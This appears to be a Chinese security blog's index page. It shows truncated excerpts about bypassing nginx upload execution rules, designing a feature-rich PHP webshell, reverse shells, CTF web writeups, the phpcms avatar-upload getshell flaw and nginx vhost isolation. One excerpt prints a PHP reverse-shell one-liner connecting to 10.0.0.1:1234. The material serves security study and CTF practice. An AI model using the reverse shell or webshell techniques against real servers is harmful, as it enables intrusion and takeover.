[該文章已設(shè)置加密，請(qǐng)點(diǎn)擊標(biāo)題輸入密碼訪問]

    無意中看到了這篇文章：http://www./articles/system/49428.html

    對(duì)于下面我莫名其妙中槍的事。。。我就不多說了：

    于是我詳細(xì)地把文章看了一遍，文章比較基礎(chǔ)但也不失為一個(gè)引導(dǎo)新手的一個(gè)方法。但其中對(duì)于禁止執(zhí)行的方式，我就不敢茍同了。在某種配置下，這個(gè)方法是能夠很容易被繞過的。

    文中提到，使用lnmp1.1搭建的nginx環(huán)境，正好我的vps也是lnmp搭建的環(huán)境，所以我可以在我的vps里做實(shí)驗(yàn)。

    看到文中的解決方案：

    在location中，將匹配到/(avatar|uploads|ups)/.*\.(php|php5)?$的請(qǐng)求全部禁用掉。

    似乎是一個(gè)很好的方法，那我們?cè)趺蠢@過？

...

閱讀全文>>

    網(wǎng)上的webshell總結(jié)起來有一些缺陷：

    1.兼容性差，當(dāng)某函數(shù)禁用后，該功能就不能用了。其實(shí)php是個(gè)很靈活的語(yǔ)言，很多功能是可以有很多實(shí)現(xiàn)方式的。

    2.功能單一，一般都只有常用的幾個(gè)功能，不夠好用。

    3.突破性不強(qiáng)，沒用利用一些php、IIS、apache、nginx的CVE來達(dá)到一些特殊目的，比如繞過open_basedir、繞過安全模式等。

    4.別人寫的自己不了解，維護(hù)起來不方便，免殺起來也不順手。

    特別是第一點(diǎn)，和第二點(diǎn)，我想自己的webshell能夠有更好的使用效果。webshell已經(jīng)寫了一半，除了常見功能。大概、我希望有如下一些比較好的：

    1.執(zhí)行命令，囊括盡可能多的方法，和一些奇技淫巧

    2.獲得內(nèi)網(wǎng)IP，并能掃描內(nèi)網(wǎng)端口

    3.利用...

閱讀全文>>

    linux下，有時(shí)候拿到webshell需要提權(quán)，提權(quán)必須要得到一個(gè)交互式的shell。

    我看了一下常用的php webshell，對(duì)于命令執(zhí)行、反彈shell都沒有完善的方式。很多webshell里都沒有proc_popen、popen這兩種方式，特別是proc_popen，比如phpspy。

    在我收集的反彈shell集合（http://tool./getshell.html）中，有一個(gè)方法，就是在命令行中輸入：

php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");'

閱讀全文>>

    只會(huì)web正好又是php的審計(jì)題目，于是就把兩道題都做了。大牛們都忙著破各種路由器，破各種設(shè)備去了，我也僥幸得了個(gè)第一：

    第一題，沒怎么截圖，查看代碼如下：

    主要是考mysql的一個(gè)trick。就是查詢出來的$row['id']和$id的區(qū)別。這么說可能有點(diǎn)不明白，我們用一下代碼fuzz一下mysql：

mysql_connect("localhost","root","root");
mysql_select_db ("test");
mysql_query("set names utf8");
for($i = 0 ; $i < 256 ; $i++){
	$c = chr($i);
	$name = mysql_real_escape_string('hehe' . $c);
	$sql = "SELECT * FROM...

閱讀全文>>

閱讀全文>>

首先我代表我們XDCTF主辦方對(duì)大家說聲辛苦了，十一假期本該休息卻依舊奮斗在CTF第一線。我是XDCTF2014的出題人之一，也是服務(wù)器的維護(hù)者之一，關(guān)于比賽不想說太多，有太多不可控制的因素。包括中途停電之類的事情，也備受吐槽。

這份writeup是幾道web題目和一個(gè)加密解密的題目，我知識(shí)面比較窄，所以題目和writeup都不能面面俱到，有一些想法在心里卻最后沒能放出來，所以這里也就不提了。

WEB20

“

什么，小P說來點(diǎn)彩頭？先出個(gè)簡(jiǎn)單的，就WEB20吧。

題目鏈接： WEB20

hint > 大家不知道復(fù)活節(jié)要玩什么嗎？（非前端題，請(qǐng)勿關(guān)注html注釋、css、javascript等）

”

WEB20是我很久以前就出好的一個(gè)題目，今年比賽特別多，不過一直沒有被人家用上，所以就當(dāng)個(gè)彩頭送出來了，沒想到還難倒了一批人。

考點(diǎn)是php彩蛋。只要運(yùn)行PHP的服務(wù)器上，訪問任何網(wǎng)頁(yè)都可以在URL后添加以下字符串來查看信息:

...

閱讀全文>>

    某比賽實(shí)在有點(diǎn)坑人，題目涉嫌抄襲不說，還不停改來改去。算了不吐槽了，說一則javascript小特性吧。

    toUpperCase()是javascript中將小寫轉(zhuǎn)換成大寫的函數(shù)。toLowerCase()是javascript中將大寫轉(zhuǎn)換成小寫的題目。但是這倆函數(shù)真的只有這兩個(gè)功能么？

    不如我們來fuzz一下，看看toUpperCase功能如何？

if (!String.fromCodePoint) {
	(function() {
		var defineProperty = (function() {
			// IE 8 only supports `Object.defineProperty` on DOM elements
			try {
				var object = {};
				var $defineProperty = Object.defineProperty;
				var result = $defineProperty(objec...

閱讀全文>>

暑假寫的文章了，最近博客沒干貨，發(fā)出來娛樂一下。

為了響應(yīng)愛慕鍋（Mramydnei）、擼大師（索馬里的海賊）、fd牛（/fd）的號(hào)召成立的parsec團(tuán)隊(duì)，以及各位老師多年來對(duì)我的教育，我要寫篇回憶稿?？礃?biāo)題大家可能覺得，這陳芝麻爛谷子的事你還拿出來說啥。當(dāng)然，我自己搓一點(diǎn)都無所謂，但怎么能丟了parsec的臉，各位還是且聽我娓娓道來~

0×01 最初的phpcms頭像上傳getshell漏洞
不知道大家還記得phpcms曾經(jīng)火極一時(shí)的頭像上傳漏洞不，因?yàn)檫@個(gè)漏洞，互聯(lián)網(wǎng)上大量站點(diǎn)被黑，影響極為惡劣。
那件事以后我分析過漏洞才成因以及利用方法（http://www./PENETRATION/phpcms-upload-getshell.html），簡(jiǎn)單來說phpcms對(duì)頭像上傳是這么處理：上傳上去的zip文件，它先解壓好，然后刪除非圖片文件。
關(guān)鍵地方代碼：

//存儲(chǔ)flashpost圖片
  $filename = $dir.$this->uid.'.zip';
  file_put_contents($filena...

閱讀全文>>

    眾所周知，虛擬主機(jī)的安全不好做，特別是防止跨站成為了重點(diǎn)。apache+php服務(wù)器防止跨站的方式比較簡(jiǎn)單，網(wǎng)上的所有成熟虛擬主機(jī)解決方案都是基于apache的，如directadmin、cpanel。

    但如今已然不是apache的時(shí)代了，在linux+nginx+mysql+php下怎么防止不同虛擬主機(jī)進(jìn)行跨站？

    首先我們要清楚明白Nginx是怎么運(yùn)行的，再考慮怎么具體操作吧。烏云知識(shí)庫(kù)里有一篇很好的文章（http://drops./tips/1323），介紹了nginx的安全配置，大家可以看看。

    nginx實(shí)際上只是一個(gè)反向代理服務(wù)器，它接收到請(qǐng)求以后會(huì)看當(dāng)前請(qǐng)求是否是.php文件，如果是則轉(zhuǎn)交給php-fpm來處理，獲得結(jié)果后再發(fā)給用戶。所以有兩個(gè)權(quán)限需要考慮：第一是nginx的權(quán)限，第二是php-fpm的權(quán)限。如下圖，nginx和php-fpm都要讀取這個(gè)文件，所以權(quán)限分配是要考慮的重要一項(xiàng)。

...

閱讀全文>>